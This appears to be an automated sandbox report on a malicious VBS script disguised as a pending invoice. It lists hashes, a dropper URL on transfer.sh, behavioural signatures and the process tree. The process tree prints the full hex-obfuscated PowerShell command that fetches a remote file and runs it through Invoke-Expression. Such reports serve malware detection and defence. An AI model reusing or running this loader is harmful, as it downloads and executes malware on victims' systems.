Analysis
-
max time kernel
0s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
05-01-2024 21:44
Static task
static1
Behavioral task
behavioral1
Sample
Pending_invoice#YT.vbs
Resource
win7-20231215-en
windows7-x64
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
Pending_invoice#YT.vbs
Resource
win10v2004-20231222-en
windows10-2004-x64
0 signatures
150 seconds
General
-
Target
Pending_invoice#YT.vbs
-
Size
1KB
-
MD5
8414a4e55d98be8c6db2a6402dc5dcf7
-
SHA1
e7b0029f57d414c59fac378cd8d96277195b0bc3
-
SHA256
766d8e9d2d0de0a0ba2440a847e7eb7da3e69d51331e15a61ec1d25d3d92fc3e
-
SHA512
5a5f4cc80581b2d6c0bc6b20e24bc12b224e6c995cb5b701fdbf0a0aa3430fa22a955d43f7c6fe6707ef3ea91b87fbaabd4e816b4953aa18db29a554ec2c863d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://transfer.sh/1fxtG6x/bypassbook.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pending_invoice#YT.vbs"1⤵PID:2356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://transfer.sh/1fxtG6x/bypassbook.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵PID:2076
-